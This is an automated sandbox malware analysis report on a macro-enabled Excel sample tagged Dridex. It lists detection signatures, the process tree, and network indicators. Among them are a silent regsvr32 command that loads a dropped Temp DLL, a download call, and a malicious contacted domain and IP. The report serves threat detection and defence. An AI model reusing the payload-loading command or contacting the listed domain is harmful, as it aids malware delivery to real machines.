Loading ...

Play interactive tourEdit tour

Analysis Report sample20210111-01.xlsm

Overview

General Information

Sample Name:sample20210111-01.xlsm
Analysis ID:338158
MD5:fa5350d4304c4c2ceafa435244b5a5fc
SHA1:fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
SHA256:0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
Tags:Dridexxlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2324 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • DW20.EXE (PID: 3032 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2472 cmdline: C:\Windows\system32\dwwin.exe -x -s 1948 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: ppdb-legacy.man1lamongan.comVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: sample20210111-01.xlsmVirustotal: Detection: 26%Perma Link
Source: sample20210111-01.xlsmReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: ppdb-legacy.man1lamongan.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.59.242.150:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.59.242.150:443
Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B9858B0.emfJump to behavior
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: ppdb-legacy.man1lamongan.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231404153.0000000003618000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000005.00000002.2231667864.00000000001ED000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: DWWIN.EXE, 00000005.00000003.2231393880.0000000000258000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2103191822.0000000001D10000.00000002.00000001.sdmp, DWWIN.EXE, 00000005.00000002.2236119170.0000000002340000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: sample20210111-01.xlsmInitial sample: CALL
Source: sample20210111-01.xlsmInitial sample: CALL
Source: sample20210111-01.xlsmInitial sample: CALL
Source: sample20210111-01.xlsmInitial sample: CALL
Source: sample20210111-01.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: sample20210111-01.xlsmOLE indicator, VBA macros: true
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal88.expl.evad.winXLSM@7/19@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$sample20210111-01.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2032
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD25.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: sample20210111-01.xlsmVirustotal: Detection: 26%
Source: sample20210111-01.xlsmReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: sample20210111-01.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: sample20210111-01.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: sample20210111-01.xlsmInitial sample: OLE indicators vbamacros = False
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: C:\Windows\System32\DWWIN.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXE TID: 2484Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting22NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sample20210111-01.xlsm27%VirustotalBrowse
sample20210111-01.xlsm8%MetadefenderBrowse
sample20210111-01.xlsm22%ReversingLabsScript-Macro.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cdn.digicertcdn.com0%VirustotalBrowse
ppdb-legacy.man1lamongan.com6%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdn.digicertcdn.com
104.18.10.39
truefalseunknown
ppdb-legacy.man1lamongan.com
199.59.242.150
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckDWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comDWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtDWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpfalse
          high
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
